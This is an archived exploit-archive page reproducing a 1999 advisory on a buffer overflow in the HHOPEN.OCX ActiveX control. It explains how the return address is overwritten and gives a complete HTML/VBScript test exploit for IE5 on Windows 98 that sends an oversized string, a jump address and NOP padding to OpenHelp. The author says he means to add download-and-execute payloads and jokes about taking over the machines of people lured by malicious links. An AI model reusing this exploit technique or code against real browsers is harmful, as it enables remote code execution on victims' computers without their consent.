what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

hhopen.txt

hhopen.txt
Posted Dec 16, 1999
Authored by DaCure

Vulnerability in HHOPEN.OCX that allows the execution of arbitrary code with IE5. Includes test exploit for IE5 5.00.2614.3500 on Win98.

tags | exploit, arbitrary
systems | windows
SHA-256 | db5b19bdf3c0cd8a9d6cb02b3858e54238509ca2b03ec61c2ca6bcd18c23352e
Download | Favorite | View

hhopen.txt

Change Mirror Download
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

HHOPEN.OCX Buffer Overflow

Discovered by DaCure <DaCure@bigfoot.com> of RaZa-MeXiCaNa Hackers Team

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX



The Problem
-----------

While playing around with VB6 and some ActiveX controls, I discovered a 
buffer overflow
in the following function:

  Hhopen1.OpenHelp(HelpFile as String, HelpSection as String) as Long

This function is included in the "hhopen OLE Control Module" (hhopen.ocx).

So we fill the buffer with a larger string:

  a = 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  Hhopen1.OpenHelp(a, "whatever")

This would overwrite the return address and make EIP point to 0x41414141 
(the last 4 "A"s).
Of course nothing is loaded there, instant page fault.

Now, we have good posibilities here for writting an exploit:

- We can overwrite the return address
- We have a large buffer to put code
- We have even more buffer space to put code (if we use HelpSection as an 
extension)

I found that EBX is the only register that points somewhere into the string 
(in fact
it points to the beginning of it... great!).

So we just need to find a "call ebx" and our code will be executed!


Test Exploit
------------


The followin is just a test exploit. I dindn't have the time to write 
somethin but I'll do
something in the next release (download and execute a file, execute a local 
file, etc.)...
just imagine the fun of owning the machine of those hornys boys that visit 
every damn porn
link you give them!


This is for IE5 with 98. It may work with others too. Tell me what you find.


---- TEST.HTM - CUT HERE ----

<html>
<head>
<title>HHOPEN.OCX IE5 Exploit</title>
</head>

<body>

<h1><font face="Arial" color="#FF0000">HHOPEN.OCX IE5 Exploit <release 
1></font>
</h1>

<p><b><font color="#0000FF"><font face="Arial">by DaCure 
<</font></font><a href="mailto:DaCure@bigfoot.com"><font face="Arial" 
color="#FF0000">DaCure@bigfoot.com</font></a><font face="Arial" 
color="#0000FF">>
of </font><a href="http://www.raza-mexicana.org"><font face="Arial" 
color="#FF0000">RaZa-MeXiCaNa
Hackers Team</font></a></b>
</p>

<p>&nbsp;
</p>

<p><font face="Arial">Tested with<b> IE5 5.00.2614.3500</b> on 
<b>W98</b>.</font>
</p>

<p><font face="Arial">May work with other versions as well.</font>
</p>

<p><font face="Arial">This will do nothing but jump to the start of the 
buffer
(our code) wich does nothing (you have to code your own exploit) until it
crashes.</font>
</p>

<p><font face="Arial">I dind't have the time to code something so the next
release I'll put something for sure (download and execute a program, execute 
a
local file, etc.).</font>
</p>

<p><font face="Arial">We have almost unlimited posibilities with this! If 
you
combine this with other bugs... guess what? even more posibilities.</font>
</p>


<p><font face="Arial">All kinds of fun owning machines!</font>
</p>

<p>
<object classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233" id="Hhopen1" 
width="10" height="10">
  <param name="_Version" value="65536">
  <param name="_ExtentX" value="2646">
  <param name="_ExtentY" value="1323">
  <param name="_StockProps" value="0">
</object>
</p>

<script language="VbScript">

a = 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
a = 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
a = a + Chr(240) + Chr(103) + Chr(233) + Chr(118)
b = String(10, Chr(&H90))
c = hhopen1.openhelp(a, b)

</script>
</body>
</html>


---- TEST.HTM - CUT HERE ----


XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


The End.


"The most inspiring things for your work are those things you realy like and 
love" --DaCure


XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX



Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close